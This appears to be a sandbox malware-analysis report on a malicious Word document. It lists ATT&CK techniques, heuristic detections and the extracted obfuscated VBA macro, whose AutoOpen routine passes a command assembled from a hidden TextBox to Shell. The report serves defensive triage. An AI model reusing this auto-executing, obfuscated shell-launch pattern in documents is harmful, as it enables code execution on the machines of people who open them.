MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of `Shell()` to invoke `cmd.exe` and references to `PowerShell`, suggesting the macro's purpose is to download and execute a secondary payload. The ClamAV detection also confirms its malicious nature.
Heuristics 10
-
ClamAV: Doc.Malware.Valyria-6786330-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6786330-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP) Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() wIkJMutiz -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7708 bytes |
SHA-256: 2cbb8b0926b1c17771262d686168f534df404019329b5c7bc039e72cec21a020 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
213 of 250 identifiers look randomly generated (e.g. 'nCtHOvuHBWVrSHtSWGHIjutQ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lQknRLjWSswoaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
wIkJMutiz
End Sub
Attribute VB_Name = "wEwXqkddllPSQ"
Function wIkJMutiz()
On Error Resume Next
Set qtZYbMPPHkhoaONcofJj = jQOGabknnMCMUwTAVhIwAP
Select Case pJJRtAHrloqGdLRA
Case 244070039
bTXfcGPtbSwBnlUEYwRJ = njVRXdrqpDhXQYvpKhCCzYo
jBFmYmUjboonBOEdXDmPQdW = 83998068
OOPOHrOrbhWYFRDiwvc = HnvdZiwmZcFfsMKXFUTwa
Case 313935757
hiFSlijSitcRbSmpcvb = CByte(zbrfsHfdibfJMNOvT)
KDtKXlPviETirBwd = ChrW(GqZZiDDoGOTFNEqWPlX)
pDFQwYaJzkiKimIEunf = Log(qVRXwqUAcIbPbE)
End Select
Set UtDpjzKEVRRCpWCBLzNUYr = qTqRfwlmpuflJWrKIEf
Select Case joQvoXWljiSPcUN
Case 146343180
iiGjibHKksfTmEQtjpCCuc = bADHcPJpJVUaZZZ
NJlEirRziCWtiKT = 314038808
WfjbTfubDVzRdqU = kptJYdjiFdZtPKwB
Case 163401679
DtqdtiqdbVTfALCjuU = CByte(mjsvAVqFBLsWwtImaTH)
OSvBOOadNqfPibmoKwpHDYoR = ChrW(wXmrZbQnZLTkrhlvNrKfc)
UGTbbdzsqddSPqoloOPcEPS = Log(TRDLpjdmFFDfYz)
End Select
Set TZcSXzscDVzdmoC = fkhjRzfKiZMNouuj
Select Case wYzwfQHjlGHzRiDV
Case 261131958
bbuoUuSkzmioJbNS = PFOAUZDfsXMRvIrAjSHRJE
fuSVBzzjjzpnQZ = 91229143
CqJbWGSCinndIGB = KCiFCEChvrcSFUbbSLEa
Case 5660799
jZcPrNJUYdzLcNqIFwob = CByte(fdzzJMMKzBbdhVJcmMoX)
SzUtsNkJFGlZwBvcRiB = ChrW(JbbWhvshjSlzDDMdfDRzbBrv)
EjTNAUinaSrXwMwUDdnUmW = Log(pSzORBVHjjjdMYTjzHLclUG)
End Select
Set jTDwUwGbmjJEIDfnoRtvqo = afpURFuQVAzKIYiqwXlKTuK
Select Case OwRBatazrccRiipWrQ
Case 260967243
ItXPFazXFdWfVW = SospcaASfvRMSiO
DHGKVbBwzwCtNGzwH = 161216422
izaLdIarUoOfpqLTYO = krmwpjYGEZwUEtMj
Case 129240892
wdBvjhIlQMDCmYiwofvC = CByte(iECVSVTKldJrqckJpHFoE)
LCCmZmIFjlQrRYzZR = ChrW(obijuLwwzmwYqOjO)
zTjwjCjwYawKLJPqtzdkbIr = Log(cpVGIvCKCfAGlPIYwnVkzm)
End Select
Set IOMNtkdzqBIoDt = dzIkpYodnJFVqKmhspQh
Select Case JQVBSYKPrDZwWpYpwHc
Case 132176974
YEoPmoEUPzmMFThmiWAiO = FjZTVOstioMpkMhmjjGvbEmj
VqCPkcpWcwIpTTpbV = 114686649
zPjVEwqRYTUBtqCzXpdzMXTI = ZzNPQTFmpjCmUzTt
Case 71227000
DHzOwQTSlsTlcwaHf = CByte(dBHzOOEGANCrKDBFQBQKwwww)
NTEGFLNSVQJJDsiKrQFPu = ChrW(PjXjZqUzhFJSBvAAuCpZo)
svNJiAHfqjnjDUjZmWzViE = Log(krmKrWDZUsbrbT)
End Select
Set zdMpPMIHwOLhnMPL = SNLQjofSVHrpRECZ
Select Case ovhmhiqAGzTAisCmf
Case 277513001
iwQojXuEQSjKIIZYTdY = iUQcpMRmOpCmOauSXGAPm
ZiZoKsJUiIGEzJjozUFH = 277042229
PuwhNGANcJwAvhCBBYd = GufJdlljHfJfowTfrdfCUVf
Case 324792420
zOzlzThiwVVPnEb = CByte(RFzASMwNXJXtbZkOhC)
XmzJLcBrcwQEZEhCPizn = ChrW(RlOownDWkGhlYEiTwlXRU)
PGFwptWVfkOuFBjVPo = Log(VsrjTBzwjTzZVRzVHjzwJzPb)
End Select
Const XsiLCDnVQ = 0
Set NElwOqSowzjVlnFfmTokB = pvFsuQQRRfwpQqjJkGHAHv
Select Case KjfFPlvsuhbOprWwCYjhB
Case 161699015
XOwcihdBftKvLOKAjWnCIocq = OKEbbOklkHqQIMKQf
UfvLhrXzKOWnimIKUWYZDfaJ = 175697927
TjXKcldsHKWDdMD = EVPwZEIwrosFspFmkaY
Case 265482981
AllKpiznRtLWcbEtiiP = CByte(YSotXASFjSDoPzDjilj)
KLaujjPOBtGrJNDhzrn = ChrW(MsDzqXGdXUOswpQNstMolD)
qLLfCvVmmwuNSH = Log(EJcmrjiOtTzqpEfzDIo)
End Select
Set fcsbQMiQCHOtFzoY = VWvBKoHzDaNEacPYBzBnOJto
Select Case dTnuBtlzEKUCLUolcNmU
Case 78999373
fwVEBnkkMcHYhUUECjb = VSuVpcNClvHTRBo
YzszNUzrunnTQXKFtEGNDz = 93170079
aiwQVoGjjjjFoitAUDb = ptlOlBaMvbkYiT
Case 154795001
WjWFjHmkrFROKFsAYLjj = CByte(kfTOukFwHWUGOinhVWiGBXfk)
BpijAXkrimBCrlWh = ChrW(jiwHwaETDpAZuMAiDtvWMH)
kPjsmiikLZNnwoDFPdQzijSn = Log(AUosbLbcjMsPiSoYEoz)
End Select
Set IVuVwJnzqbQCYWb = lITBGjYLIbAXsobW
Select Case qqiZQiLiBBPfoMGCh
Case 296296185
zBAcwiMXIQFCztlijskV = IWFfJfTPuUKvzXPqOlqD
COwwPlDdZJwXzqf = 309760530
nCtHOvuHBWVrSHtSWGHIjutQ = UKOYzhjvQwoJAnSCrNPhm
Case 44670684
DEdjYmRsIcVulj = CByte(EpmvBIFIWToGojiizNHLT)
zLJzFfhithWIJavqEu = ChrW(vHQjjcLitWjiUPjramBCabsa)
jfXDnIINNYNhccX = Log(AnHMDBtZjUDDsWTOqbwzobF)
End Select
Set YKddUFVHRiLnJKswNm = cUzjZbUiYwBrBJYurMi
Select Case tGOjqjZOJTiBwNSD
Case 173200272
DBAawLPnKdkQAlibfVFO = qBGVERAsnrVTNIhKTJDUCY
dsSsWXhwzMnMzuFstOvWlPwm = 191103109
RLLCtnRFcclZiVGvXHawhPOR = FHCKNvfPZGVkuSAu
Case 305682072
cGTkaQqspMjPBzuso = CByte(PuPjGKEOkKdpZBmwlLqU)
mUVGTiJFYqBdUfzBvAJj = ChrW(jfOzmfdCLiCTzdau)
mbvJLUcLFVnwpLjoVFo = Log(GjCjCMHwJVCYHWN)
End Select
iBSDBPPH = lQknRLjWSswoaR.TextBox1 + zUTEFUq + HqWKwK + aokNE + qAjaFZht + RwQmX + uCDYWtY + fddXOKqG + dECAGrXS + XqiQjEZ + uvwLhku + NdRPOS + hvZmFE
Set NNdGcQIiTSCVHYOUzuUBVZG = LzBQktSrkKklEBwafk
Select Case miSXjoJwKicYnGHufPrzZA
Case 72631735
zncPwwuVlkTotZSbbvHJI = wizGQLomPmXhZvMuzMoGn
nSBFwPWisBcLrz = 114911384
hjhwVhQLAWPhvuVBwtriFLO = QluVENEOcHiEZohGCpF
Case 175768003
pizjbNwFmmWUIi = CByte(mvHmRAEoPQbJLlcQFnYbD)
ocAGIqVIkRGwTHhSJzkuiQAD = ChrW(UJWQhjHjqGfmLrOSHjKDMS)
iniZqJNYcwTojzsChw = Log(cACfzHWbakpAZBnnc)
End Select
Set GNviLTHUVrwpqtPu = QpHAcFWAqBjSbOjZbhZAObZE
Select Case fflFJakuHnwALiHZiURbCud
Case 108125856
OLqujpQCFzZlvhawY = bhYPDSajGHdslCUouO
AXzizFjhojnqfdaBirwIYTz = 232343188
ZNMXQGnMCXvdzaJ = kmATQwOKAmwvGVjXOZ
Case 162020694
UKYczicFiYjRolojzQsazBW = CByte(KrFjrYPaBRBZOXTlVIfc)
fGUhzYwjzsTnuS = ChrW(ZwOGJJPXjOSbwHF)
VubfkkwrzQuEYilUFLMZtZS = Log(PjlThwBYsCztTnXozXGsOLw)
End Select
zWlvjzw = Array(hPBzfKC, VLWlsB, nXbWSa, Interaction _
_
_
_
_
_
_
_
.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)
Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu
Select Case ljktcBiIzSnaprnziwdz
Case 173283479
QVEOzEcDwkGXrXQQtLjX = IDBiWNwEpwuDFSPoN
ifuWDUSAQjSFST = 16938488
HRCjbrizHoLTlEBbf = CrVmAhMVwPljibB
Case 272539931
zmdcmBuOOIwOLhqZ = CByte(RKvVQUWFuPNXKkSw)
DpCfPqaYlZOGlhuKTKqupjR = ChrW(WsljrEYjSRdBXfB)
UwivIzIiSMqabBEWYv = Log(WFtjhBhoUEtnnIW)
End Select
Set wXuzMWPLYADiwbzkPh = MuUwadFFRpHsWZcYdUXJwAo
Select Case azifiwuTuASYdbT
Case 142005449
QwWRIhFTCTQsXwM = OVcwZaUvnzWGDuB
BCfBRpSQZLccdb = 149594902
GSPFrWhqibdKLw = HSPqVRKoYDMZNwrRM
Case 178018776
zkfvJfUpXqLIFavUK = CByte(kBmwiqCizTrmJRjsz)
cWFLBbmzNvGwSihCbZjC = ChrW(otihAwlhuYMbPsn)
ZzKJjdHYwBNEGqJ = Log(wYndadAdBQTWuXDm)
End Select
Set EmWRFHiVQiMEZcmcdB = KfKjKfowRQERHH
Select Case lnFhmrnOKhhNJfWlTkDwotGM
Case 251990940
KMFLREwdrwWwPIWQA = cSfQuflhEJHrhtvVhaJwPdQj
XOWVubYsGjUluSaakznVAR = 194471199
tbwGCjwBzcWQOM = hjwbJbjmIjYfidKn
Case 43792362
VbSfRqWkSlSvJLYoFmBpT = CByte(KpoWiEUYooQftlrCRHE)
IzUMaMHpXYlQRvQdrvM = ChrW(QuzdfiSnzDUtluRMU)
wRwiAPCzNzUOLWvlIOA = Log(jvuUsUErfWiEJPwuWlthajQ)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.